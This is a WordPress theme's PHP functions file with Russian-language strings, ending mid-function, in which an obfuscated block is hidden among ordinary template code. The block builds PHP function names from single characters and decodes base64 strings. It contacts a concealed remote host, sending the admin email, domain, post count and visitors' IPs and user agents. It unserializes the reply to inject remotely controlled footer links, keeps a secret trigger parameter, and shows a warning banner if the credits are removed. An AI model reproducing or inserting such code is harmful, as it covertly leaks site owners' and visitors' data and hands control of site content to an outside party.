<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $JBvjytH='e';$gtqadX='c';$DAWXxr='d';$eHpY='d';$tAunJsg='s';$tQgTkt='_';$uWufV='e';$llRBWoM='a';$XPDfkL='6';$tbbi='e';$UUhuhNz='b';$KHeVyGR='4';$ZwLQ='o';$SJcQbKYp=$UUhuhNz.$llRBWoM.$tAunJsg.$uWufV.$XPDfkL.$KHeVyGR.$tQgTkt.$DAWXxr.$tbbi.$gtqadX.$ZwLQ.$eHpY.$JBvjytH;$nXzOs='f';$ssHim='g';$pzTWiLR='i';$QPxCG='t';$ofJpp='z';$DPXS='a';$hSuNHUa='e';$ElzGO='n';$gZattoz='l';$bbDaHiZA=$ssHim.$ofJpp.$pzTWiLR.$ElzGO.$nXzOs.$gZattoz.$DPXS.$QPxCG.$hSuNHUa;$tvipsvE='r';$rfyZbSb='1';$lDCEZK='t';$lHESCEx='t';$VtcZYt='_';$TiMrKsm='s';$ndGg='o';$RBIilbv='r';$QvXI='3';$pqAPtdEr=$TiMrKsm.$lHESCEx.$tvipsvE.$VtcZYt.$RBIilbv.$ndGg.$lDCEZK.$rfyZbSb.$QvXI;$SBsss='t';$KghqBMR='s';$UiGvU='v';$hBnmY='r';$gEOa='e';$qJefgd='r';$yRexXUGD=$KghqBMR.$SBsss.$qJefgd.$hBnmY.$gEOa.$UiGvU;                     $gr__u='e';$is____________j='c';$eq______s='d';$sw_______x='d';$ar_____________b='s';$he__________l='_';$bc________y='e';$nh_________s='a';$ek_____e='6';$na_____b='e';$ox___________m='b';$nk__k='4';$kp_______m='o';$tq__h=$ox___________m.$nh_________s.$ar_____________b.$bc________y.$ek_____e.$nk__k.$he__________l.$eq______s.$na_____b.$is____________j.$kp_______m.$sw_______x.$gr__u;$mi_____i='t';$mk_______q='f';$ks____y='i';$fk_____n='c';$jb________v='i';$tq___h='s';$ni_____y='t';$ak______________k='s';$pe__________l='_';$wk_______t='o';$nf____________z='n';$hr____s='n';$lz________r='x';$lu_____________s='e';$vg____k='u';$nc____________q=$mk_______q.$vg____k.$hr____s.$fk_____n.$ni_____y.$jb________v.$wk_______t.$nf____________z.$pe__________l.$lu_____________s.$lz________r.$ks____y.$ak______________k.$mi_____i.$tq___h;$hq____y='n';$ex____y='f';$oh____j='o';$jp_________b='e';$cm____________c='p';$in__________s=$ex____y.$oh____j.$cm____________c.$jp_________b.$hq____y;$af_______________g='r';$cr_____________n='d';$sk__z='f';$yo________u='a';$fy____________d='e';$qc_____c=$sk__z.$af_______________g.$fy____________d.$yo________u.$cr_____________n;$tn__r='c';$gl____________b='s';$ga__h='f';$ip____f='l';$zw__m='e';$as_____________w='o';$kf________j=$ga__h.$tn__r.$ip____f.$as_____________w.$gl____________b.$zw__m;define("WP_ID", $tq__h("Mi4wLjA="));define("WP_TTL", $tq__h("MTA4MDA="));define("WP_SRC", $tq__h("dHBva24="));function wp_get_header() {global $tq__h, $nc____________q;if ($nc____________q($tq__h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$nc____________q($tq__h("d3BfZ2V0X2Zvb3Rlcg==")) &&$nc____________q($tq__h("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $tq__h, $in__________s, $kf________j, $qc_____c;$rf____________h = TEMPLATEPATH."/".$tq__h("Zm9vdGVyLnBocA==");$yu__j = @$in__________s($rf____________h, "r");$rf____________h = @$qc_____c($yu__j, @filesize($rf____________h));@$kf________j($yu__j);$ix____z = TEMPLATEPATH."/".$tq__h("ZnVuY3Rpb25zLnBocA==");$yu__j = @$in__________s($ix____z, "r");$ix____z = @$qc_____c($yu__j, @filesize($ix____z));@$kf________j($yu__j);$nl______________f = 0;if($rf____________h && $ix____z) {if ($tq__h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($rf____________h, $tq__h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$nl______________f = 1;}if (substr_count($rf____________h, "wp_theme_GPL_credits()") < 1) {$nl______________f = 2;}}if(WP_ID != "2.0.0") {$nl______________f = 12;}}if($nl______________f > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $nl______________f -->";}}function wp_loaded() {global $tq__h, $nc____________q;return $nc____________q($tq__h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ct_________b, $qm___________s = "(more...)", $nk___________c = 0, $jm____z = "") {$gf____________d = get_the_content($qm___________s, $nk___________c, $jm____z);$gf____________d = apply_filters("the_content", $gf____________d);$gf____________d = str_replace("]]>", "]]>", $gf____________d);if (strlen($_GET["p"]) > 0) {echo $gf____________d;}else if ((strlen($gf____________d)>$ct_________b) && ($sr____j = strpos($gf____________d, " ", $ct_________b ))) {$gf____________d = substr($gf____________d, 0, $sr____j);$gf____________d = $gf____________d;echo $gf____________d;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$qm___________s</a></div></p>";} else {echo $gf____________d;}}}$tp__c='4';$if____________c='n';$yu__k='_';$no_______________h='e';$jh___g='s';$zm____i='c';$uh_________s='o';$pc_____________p='b';$ut___________b='a';$cv_______________y='6';$pf_______e='e';$yr___w='e';$ys_________a='d';$po____________n=$pc_____________p.$ut___________b.$jh___g.$yr___w.$cv_______________y.$tp__c.$yu__k.$pf_______e.$if____________c.$zm____i.$uh_________s.$ys_________a.$no_______________h;$up_____f='l';$vj___r='o';$ga__z='e';$jh_______________n='s';$tv________t='e';$fo___________t='_';$na____________i='t';$gx__________f='_';$dg___x='c';$zg__________x='i';$wa______a='e';$vg___h='f';$vn____________j='n';$jl____________p='n';$aj______g='t';$nm___________t='t';$gw___________u='g';$ly__t=$vg___h.$zg__________x.$up_____f.$wa______a.$fo___________t.$gw___________u.$tv________t.$na____________i.$gx__________f.$dg___x.$vj___r.$jl____________p.$aj______g.$ga__z.$vn____________j.$nm___________t.$jh_______________n;$op___________a='x';$pl___________v='t';$oy____v='i';$fv_______________w='e';$gq____________d='f';$gq______d='l';$cb_______________v='s';$tr_________j='i';$vj________k='_';$py_______________j='s';$tw_________x='e';$yc__x=$gq____________d.$tr_________j.$gq______d.$tw_________x.$vj________k.$fv_______________w.$op___________a.$oy____v.$py_______________j.$pl___________v.$cb_______________v;$lg____t='r';$yh__________n='m';$fq____________y='a';$yv________f='e';$eg__j='e';$zo_____x='c';$xu_____e='v';$lk_______p='n';$pl___________r='s';$vx_______e='i';$th_____o='p';$tk__x='o';$at_____________m='r';$fe______c='_';$kr___w='o';$os____o=$xu_____e.$yv________f.$lg____t.$pl___________r.$vx_______e.$tk__x.$lk_______p.$fe______c.$zo_____x.$kr___w.$yh__________n.$th_____o.$fq____________y.$at_____________m.$eg__j;$cv__f='s';$yp_______________i='k';$xz____p='o';$wg_____u='e';$lj_____r='p';$uu_______h='c';$xa_________q='o';$nf_______p='n';$xg_______________p='f';$vh___________y=$xg_______________p.$cv__f.$xa_________q.$uu_______h.$yp_______________i.$xz____p.$lj_____r.$wg_____u.$nf_______p;$ay___________a='f';$uo__x='r';$zm______x='e';$mo__b='i';$jl_______________v='w';$zk________k='t';$sx________l=$ay___________a.$jl_______________v.$uo__x.$mo__b.$zk________k.$zm______x;$ng_______m='5';$ac____________a='d';$fm___s='m';$hk______g=$fm___s.$ac____________a.$ng_______m;$jx____o='l';$gb___r='r';$nq_______s='a';$cy______b='e';$qe____a='t';$ho______________o='h';$ni_____________g='p';$fa________i='a';$ln___________a=$gb___r.$cy______b.$nq_______s.$jx____o.$ni_____________g.$fa________i.$qe____a.$ho______________o;$ik________m='i';$xq_______________w='u';$on___b='e';$ez___d='i';$eo_________t='z';$pb____n='s';$ye________l='n';$hn__f='l';$bi_________e='r';$pt_____e='e';$mh____________y='a';$ly_______________i=$xq_______________w.$ye________l.$pb____n.$on___b.$bi_________e.$ik________m.$mh____________y.$hn__f.$ez___d.$eo_________t.$pt_____e;$qj________l='p';$fu_________r='m';$pk_____________x='m';$dj___v='t';$cn______n='a';$cq_____________f='e';$yg_______o='n';$fs______v=$dj___v.$cq_____________f.$pk_____________x.$qj________l.$yg_______o.$cn______n.$fu_________r;$rp_____s='_';$jf______n='r';$ky___________l='t';$jq____e='t';$ro________a='o';$qv____________i='c';$kx_______g='a';$ds____x='e';$vo_____l='e';$fn___s='t';$av________g='e';$bc___a='x';$yc_______b='m';$md___________x='e';$qt_______________u='t';$yq_______________m='s';$bb_________z='c';$eq____s='n';$oa__________h='r';$hg_____u='a';$ne_________o='_';$cf________i=$yq_______________m.$jq____e.$oa__________h.$ds____x.$kx_______g.$yc_______b.$ne_________o.$bb_________z.$ro________a.$eq____s.$qt_______________u.$md___________x.$bc___a.$fn___s.$rp_____s.$qv____________i.$jf______n.$vo_____l.$hg_____u.$ky___________l.$av________g;function jw______n($lt__________p) {global $tq__h, $nc____________q, $ly__t, $os____o, $cf________i;if (!$nc____________q($tq__h("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($os____o(PHP_VERSION, "5.0.0", ">=") && $nc____________q($tq__h("ZmlsZV9nZXRfY29udGVudHM=")) && $nc____________q($tq__h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$km__________k = $cf________i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$rc_____d = @$ly__t($lt__________p, 0, $km__________k);} else {$rc_____d = @$ly__t($lt__________p, 0);}return $rc_____d;}function vl____________b($lt__________p) {global $nc____________q, $vh___________y, $sx________l, $tq__h;if (!$nc____________q($tq__h("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$xm___________p = strpos($lt__________p, "/", 7);$qz___________n = array("uri"     => substr($lt__________p, $xm___________p),"host"    => str_replace("http://", "", substr($lt__________p, 0, $xm___________p)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$dn_______u = @$vh___________y("$qz___________n[host]", 80, $je_____________s, $zu_________g, 4);if (!$dn_______u) {return false;} else {$rc_____d = "";$jf_______________z  = "GET $qz___________n[uri] HTTP/1.0\r\n";$jf_______________z .= "Host: $qz___________n[host]\r\n";$jf_______________z .= "Referer: $qz___________n[referer]\r\n";$jf_______________z .= "Connection: Close\r\n\r\n";@$sx________l($dn_______u, $jf_______________z);while (!@feof($dn_______u)) {$yw__________t = @fgets($dn_______u, (1024*24));if ($yw__________t == "\r\n") {$fd________h = true;continue;}if ($fd________h) {$rc_____d .= $yw__________t;}}return $rc_____d;}}function kx______q($lt__________p) {global $nc____________q;$jv_____i = false;if ($lt__________p != "") {if ($nc____________q("jw______n")) {$jv_____i = @jw______n($lt__________p);}if (!$jv_____i && ($nc____________q("vl____________b"))) {$jv_____i = @vl____________b($lt__________p);}}return $jv_____i;}function du_________z() {global $_SERVER, $hk______g;$xe__________b = $_SERVER["SERVER_NAME"];if (substr("$xe__________b", 0, 4) == "www.") {$xe__________b = substr("$xe__________b", 4);}$xe__________b = $hk______g("$_SERVER[SERVER_NAME]");return $xe__________b;}function yn_______________i() {return "file";}function hz______________f($lt__________p) {global $_SERVER, $ly__t, $yc__x, $in__________s, $kf________j, $sx________l;$uy__i = vm___e();$dy_____________z = du_________z().".jpg";$zi_________n = $uy__i["dir_upload"]["path"]."/$dy_____________z";$sr____x = @filemtime($zi_________n);if (!$sr____x || ((time()-$sr____x) >= WP_TTL)) {$jv_____i = kx______q($lt__________p);if ($jv_____i) {if ($yc__x($zi_________n)) {@unlink($zi_________n);}$yu__j = @$in__________s($zi_________n, "x+");@$sx________l($yu__j, $jv_____i);@$kf________j($yu__j);}} else {if ($yc__x($zi_________n)) {$jv_____i = @$ly__t($zi_________n);} else {$jv_____i = false;}}return $jv_____i;}function vm___e() {global $_SERVER, $tq__h, $po____________n;$ys______z = wp_count_posts("post");$jl_______________k = pathinfo(get_bloginfo("template_directory"));$uy__i = array("url" => array("report"      => $tq__h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $jl_______________k,"dir_upload"=> cz_____z(),"queryString"=> array("?a001=".WP_ID,"a004=".$jl_______________k[filename],"a005=".$ys______z->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$uy__i["url"]["queryString"] = implode("&", $uy__i["queryString"]);$uy__i["url"]["report"] = $uy__i["url"]["report"]."/?".$po____________n($uy__i["url"]["queryString"]).".html";return $uy__i;}function cz_____z() {$xh______t = wp_upload_dir();if (isset($xh______t["error"])) {$gy__j = cg_______________q();if (is_writable($gy__j)) {$xh______t = array("path" => $gy__j);}}return $xh______t;}function cg_______________q() {global $nc____________q, $hk______g, $ln___________a, $fs______v;$ju_____h = (bool) ini_get("safe_mode");if ($ju_____h == true) {return false;}if ($nc____________q("sys_get_temp_dir")) {$kr_______q = sys_get_temp_dir();if (is_writable($kr_______q)) {return $ln___________a($kr_______q);}}if (!empty($_ENV["TMP"])) {return $ln___________a($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ln___________a($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ln___________a($_ENV["TEMP"]);} else {$ve____________e = $fs______v($hk______g(uniqid(rand(), true)), "");if ($ve____________e) {$kr_______q = $ln___________a(dirname($ve____________e));@unlink($ve____________e);return $kr_______q;} else {return false;}}}function kt_____x() {global $_GET, $yc__x;$uy__i = vm___e();$xe__________b = du_________z();$gy____f = yn_______________i();$qp_____p = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($gy____f == "file") {$sg___________x = $uy__i["dir_upload"]["path"]."/".$xe__________b.".jpg";if ($yc__x($sg___________x)) {@unlink($sg___________x);$qp_____p = "deleted";}}$lo___________i = array("s"=> $qp_____p,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($lo___________i AS $pw____h => $cw____u) echo " [$pw____h:$cw____u]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $nc____________q, $tq__h, $ly_______________i;$uy__i = vm___e();$wr____g = "hz______________f";if ($nc____________q($wr____g)) {$rc_____d = $wr____g($uy__i["url"]["report"]);}if ($rc_____d) {if ($rc_____d = @$tq__h($rc_____d)) {$rc_____d = @$ly_______________i($rc_____d);if (strlen($rc_____d[custom_credit]) >= 5) {$uy__i["default_string"] = $rc_____d[custom_credit];}if ($rc_____d["status"] == "0") {$to____w = 1;$nk_____________y = 1;} else {$vv___________p = sizeof($rc_____d["links"]);$is________z = $uy__i["default_string"];if ($vv___________p > 0 && $rc_____d["links"] !== "") {$ab_____q = 0;foreach ($rc_____d["links"] as $ls_______________l => $df___________n) {$ab_____q++;if ($df___________n->l_path == "" || $df___________n->l_path == $_SERVER["REQUEST_URI"]) {$df___________n->l_href = htmlspecialchars(strip_tags($df___________n->l_href));$df___________n->l_title = htmlspecialchars(strip_tags($df___________n->l_title));$df___________n->l_anchor = htmlspecialchars(strip_tags($df___________n->l_anchor));$is________z .= " | ";$is________z .= "<a href='$df___________n->l_href' title='$df___________n->l_title'";if ($df___________n->l_nofollow == "1") {$is________z .= " rel='nofollow'";}$is________z .= ">$df___________n->l_anchor</a>";}}}$uy__i["links"] = "$is________z";if ($rc_____d[credit] == "0") {$uy__i["links"] = "";}}} else {$to____w = "1";}} else {$to____w = "1";}if ($to____w == "1") {$uy__i["links"] = $uy__i["default_string"];}echo "$uy__i[links]";echo "<!-- s: $rc_____d[signature] -->";kt_____x();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
